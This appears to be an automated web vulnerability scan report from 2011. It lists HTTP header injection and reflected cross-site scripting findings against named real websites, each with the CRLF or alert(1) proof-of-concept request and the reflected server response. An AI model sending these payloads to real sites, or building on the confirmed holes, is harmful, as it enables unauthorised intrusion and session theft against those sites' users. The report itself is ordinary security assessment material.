HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://www.blogcindario.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogcindario.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e67a6%0d%0a4f4bcb249b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e67a6%0d%0a4f4bcb249b4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogcindario.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 04 May 2011 03:22:07 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=120
Location: http://blogcindario.miarroba.es/e67a6
4f4bcb249b4

Content-Length: 178

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

5.2. http://www.freeonlinejobsathome.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinejobsathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d7ea0%0d%0a37c07b155f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d7ea0%0d%0a37c07b155f7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeonlinejobsathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:13:27 GMT
Location: /d7ea0
37c07b155f7
/


5.3. http://www.freestuff4free.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freestuff4free.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63b68%0d%0a5721c674311 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63b68%0d%0a5721c674311 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freestuff4free.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:44:02 GMT
Location: /63b68
5721c674311
/


5.4. http://www.gatewaync.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gatewaync.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 509f6%0d%0ae5102b583cd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /509f6%0d%0ae5102b583cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gatewaync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Wed, 04 May 2011 02:27:04 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.gatewaync.com/509f6
e5102b583cd

Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

5.5. http://www.gunsholstersandgear.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gunsholstersandgear.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d6d79%0d%0a89be4f711f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d6d79%0d%0a89be4f711f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gunsholstersandgear.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:40:59 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://gunsforsale.com/ghg/d6d79
89be4f711f9


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

5.6. http://www.lifeaftertheoilcrash.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifeaftertheoilcrash.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 29009%0d%0aaa14ffab9a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /29009%0d%0aaa14ffab9a3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lifeaftertheoilcrash.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 02:19:17 GMT
Location: /29009
aa14ffab9a3
/


5.7. http://www.onlinepublicrecordssearch.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinepublicrecordssearch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 390e6%0d%0aa34bfc1141b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /390e6%0d%0aa34bfc1141b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlinepublicrecordssearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:55:31 GMT
Location: /390e6
a34bfc1141b
/


5.8. http://www.powertrainproducts.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powertrainproducts.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bc096%0d%0aeab3069c4b2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bc096%0d%0aeab3069c4b2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.powertrainproducts.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:21:44 GMT
Location: /bc096
eab3069c4b2
/


5.9. http://www.schools.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.schools.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f1df%0d%0a26bc41f2110 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f1df%0d%0a26bc41f2110 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schools.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Error
Location: https://www.schools.org/5f1df
26bc41f2110

Server: Microsoft-IIS/5.0
Content-Type: text/html
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.schools.org/5f1df
26bc41f2110">here</a></body>

5.10. http://www.verifiedworkathome.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verifiedworkathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ec18%0d%0a89f559e2a7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ec18%0d%0a89f559e2a7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verifiedworkathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:21:04 GMT
Location: /7ec18
89f559e2a7c
/


5.11. http://www.wow-pro.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wow-pro.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 95d45%0d%0ad5514d9a0df was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /95d45%0d%0ad5514d9a0df HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wow-pro.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:18:20 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://wow-pro.com/95d45
d5514d9a0df


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

6. Cross-site scripting (reflected)  previous  next
There are 119 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://4qinvite.4q.iperceptions.com/1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b897a'-alert(1)-'214b9e0ef2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB2&b897a'-alert(1)-'214b9e0ef2a=1 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xga0ep454evqtcyfbmbffqev; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1104

var sID= '34559'; var sC= 'IPE34559'; var brow= 'AppleMAC-Safari'; var vers= '5.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB2&b897a'-alert(1)-'214b9e0ef2a=1';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);function CCook(n,v,d)
...[SNIP]...

6.2. http://4qinvite.4q.iperceptions.com/1.aspx [sdfc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc14d'-alert(1)-'0a31bfdbcdc was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483cc14d'-alert(1)-'0a31bfdbcdc&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ptjpjonetc5l0gfmuztitx45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1101

var sID= '34559'; var sC= 'IPE34559'; var brow= 'AppleMAC-Safari'; var vers= '5.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483cc14d'-alert(1)-'0a31bfdbcdc&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct
...[SNIP]...

6.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5e0'-alert(1)-'48283461885 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193ef5e0'-alert(1)-'48283461885&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:29:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:29:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:29:42 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ef5e0'-alert(1)-'48283461885&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

6.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae1ed'-alert(1)-'cf9de347f51 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchae1ed'-alert(1)-'cf9de347f51 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:30:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:30:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:30:07 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchae1ed'-alert(1)-'cf9de347f51?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

6.5. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5f781<script>alert(1)</script>30271df9147 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.truewoman.com%2F&callback=_ate.cbs.sc_httpwwwtruewomancom5f781<script>alert(1)</script>30271df9147 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; uid=4dab4fa85facd099; psc=3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 04 May 2011 01:12:09 GMT
Content-Length: 89
Connection: close

_ate.cbs.sc_httpwwwtruewomancom5f781<script>alert(1)</script>30271df9147({"shares":815});

6.6. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.truewoman.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 58f5c<script>alert(1)</script>b5565e4673a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.truewoman.com/p.json?callback=_ate.ad.hpr58f5c<script>alert(1)</script>b5565e4673a&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D1369&ref=http%3A%2F%2Fwww.truewoman.com%2F&o1bgp HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 452
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 04 May 2011 01:12:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 03 Jun 2011 01:12:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304471552.1FE|1304471552.1OD|1304471552.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 17:01:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 04 May 2011 01:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close

_ate.ad.hpr58f5c<script>alert(1)</script>b5565e4673a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degrees.com/orbser
...[SNIP]...

6.7. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getCommentCounts.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7071a'><script>alert(1)</script>269acc97b81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentCounts.php7071a'><script>alert(1)</script>269acc97b81?src=wp-2&acct=e2df9b6910383c7e8b7c05e99be5e886&ids=1017|847|811|804|787|778|708|602|593|582|&guids=&links=http://www.quantumjumping.com/blog/meet-your-doppelganger/|http://www.quantumjumping.com/blog/the-alpha-level/|http://www.quantumjumping.com/blog/were-they-the-special-few/|http://www.quantumjumping.com/blog/to-infinity-and-beyond-week-1/|http://www.quantumjumping.com/blog/tales-of-angelic-guidance/|http://www.quantumjumping.com/blog/encounters-with-angels/|http://www.quantumjumping.com/blog/spiritual-awakening/|http://www.quantumjumping.com/blog/the-invisible-anchor-report/|http://www.quantumjumping.com/blog/past-life-regression/|http://www.quantumjumping.com/blog/quantum-lullaby/|&titles=Meet%2BYour%2BDoppelganger%253A%2BQuantum%2BJumping%2BTips%2BWeek%2B3|The%2BAlpha%2BLevel%253A%2BQuantum%2BJumping%2BTips%2BWeek%2B2|Were%2Bthey%2Bthe%2Bspecial%2Bfew%253F%2B|To%2BInfinity%2Band%2BBeyond%253A%2BWeek%2B1|Tales%2Bof%2BAngelic%2BGuidance|Close%2BEncounters%2Bof%2B